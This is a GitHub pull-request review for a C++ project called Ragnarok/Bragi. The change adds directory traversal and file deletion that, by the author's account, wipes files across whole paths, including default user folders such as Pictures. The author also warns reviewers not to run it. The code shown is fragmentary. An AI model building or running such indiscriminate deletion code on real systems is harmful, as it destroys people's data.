### PR TITLE
File Deletion in all paths

### PR DESCRIPTION
**Pull request by DigitMan27**
Delete and File-Folder Traversal works but there are Error_Handle Error

### CODE REVIEW

File: Ragnarok/Bragi/Bragi.cpp [hunk 1]
```diff
@@ -19,18 +19,25 @@
...
+	std::vector<std::wstring> ListDir(std::wstring s)
 	{
 		std::vector<std::wstring> contents;
-		std::wstring s = Path() + L"\\*";
+		std::wstring w = s  + L"\\*";
 		WIN32_FIND_DATAW data;
-		HANDLE hFind = FindFirstFileW((LPCWSTR)s.c_str(), &data);      // Starts to find the first file inside the directory
+		HANDLE hFind = FindFirstFileW((LPCWSTR)w.c_str(), &data);      // Starts to find the first file inside the directory
 
 		if (hFind != INVALID_HANDLE_VALUE) {
```
Comment (ghost) [inline Ragnarok/Bragi/Bragi.cpp:36]: Nice check here!

File: Ragnarok/Bragi/Bragi.cpp [hunk 2]
```diff
@@ -40,4 +47,31 @@
 		}
 		return contents;
 	}
+
+	int Delete(std::wstring s)
+	{
+				if (_wremove(s.c_str()))
```
Comment (ghost) [inline Ragnarok/Bragi/Bragi.cpp]: Nice check too

File: Ragnarok/Bragi/Bragi.cpp [hunk 3]
```diff
@@ -40,4 +47,31 @@
...
+				{
+					return 0;
+				}
+		return -1;
+	}
+
+	void cd(std::wstring s) //It will wroks with recursion.I have to split this func into two or more parts in order the recursion works.
```
Comment (ghost) [inline Ragnarok/Bragi/Bragi.cpp]: Fix typo in the comment `wroks`

File: Ragnarok/Bragi/Bragi.h [hunk 4]
```diff
@@ -4,6 +4,7 @@
 	#include <iostream>
 	#include <errno.h>
 	#include <vector>
+	#include <stack>
```
Comment (ghost) [inline Ragnarok/Bragi/Bragi.h]: Why do you need the stack here?

File: Ragnarok/Bragi/Bragi.h [hunk 5]
```diff
@@ -21,14 +22,21 @@
...
+	#include <wchar.h>
+	#include <sys/stat.h>
+	#include <sys/types.h>
+	#include <Shlwapi.h>
 
-	/*#pragma comment(lib, "User32.lib")*/
+	#pragma comment(lib, "Shlwapi.lib")
 	#define LEN 64
-	#define PATH 128
+	#define PATH 512
```
Comment (ghost) [inline Ragnarok/Bragi/Bragi.h]: In my opinion, the max path size should be at least 2048 in case there are too many subfolders

**Review by ghost — COMMENTED** [review]
In overall it looks good

File: Ragnarok/Bragi/Bragi.cpp (hunk 3 above)
Comment (DigitMan27) [reply Ragnarok/Bragi/Bragi.cpp]: lol

File: Ragnarok/Bragi/Bragi.h (hunk 4 above)
Comment (DigitMan27) [reply Ragnarok/Bragi/Bragi.h]: I was think about something but did not work and i forgot to delete this line

Comment (ghost) [reply Ragnarok/Bragi/Bragi.h]: oh ok!

**Comment by DigitMan27** [comment]
@xorz57 `Just a comment:` The deletion of the files from all folders in the path you set is working plus for default os folders as pictures videos and other...I'm excited!!!!!!! :) :) i just delete all my pics!!!!!!!!!!

**Comment by ghost** [comment]
@DigitMan27 Thats great news !!! :+1: I will get back to this project when you set some things up the way you like first. Then I will do some debugging and hopefully some issue requests!

**Comment by DigitMan27** [comment]
@xorz57 check the new small piece of code that i inserted.

**Comment by DigitMan27** [comment]
@xorz57 ***IMPORTANT***: Do not run the program in you pc in that form!!!!!
See the changes before procced.

**Comment by ghost** [comment]
@DigitMan27 Understood

**Review by ghost — APPROVED** [review]
Seems to be working!

**Pull request merged**